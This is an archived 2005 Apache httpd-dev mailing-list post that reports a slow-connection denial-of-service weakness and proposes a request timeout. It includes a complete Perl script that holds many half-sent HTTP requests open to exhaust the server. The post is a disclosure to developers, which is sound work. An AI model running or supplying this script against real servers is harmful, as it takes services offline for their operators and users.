httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Ivan Barrera A." <Br...@Ivn.cl>
Subject Timeout for requests
Date Tue, 03 May 2005 14:51:03 GMT
Hi...

 I'm still fighting (probably for a lost cause.. but my boss ask me to
do this).
 In the socket activity there are some troubles dealing with timeouts.
It is pretty easy to Anyone DoS any apache webserver.
 I want to propose implementing a request timeout time, or at least a
check for incoming data.

 If you open many sockets to an apache server, you can keep it alive,
and make apache keep it open for a looong time, eating resources. If you
limit the numbers of conecctions per ip, you still can DoS apache using
2 or more other ips.

 All this was tedtes with Timeout set to 20, KeepAlive set to 5, and all
relevant options to their lowest value.


 (one of the common scrips used to kill apache, is apache-squ1rt, i use
this other to test)
 Use this perl script to test :

#!/usr/bin/perl

my $Child = 150;
my $Sleep = 10;

use IO::Socket;
use strict;

my($c);
my(@SOCKET);
my($t);

local $| = 1;

$c=0;
for(0..$Child) {
  @SOCKET[$c] = new IO::Socket::INET( Proto   => "tcp",
                                            PeerAddr=> "127.0.0.1:80");
  $c++;
}

for(0..$Child) {
  if ( defined @SOCKET[$c]) {
    $t = @SOCKET[$c];
    print $t "GET / HTTP/1.1";
  }
}


while(1){
  $c=0;
  # For each children
  for(0..$Child) {
    if ( defined @SOCKET[$c]) {
      $t = @SOCKET[$c];
      print $t "host: test.test";
    }
    $c++;
  }
  sleep ($Sleep);
}

$c=0;
for(0..$Child) {
  close(@SOCKET[$c++]);
}

Mime
View raw message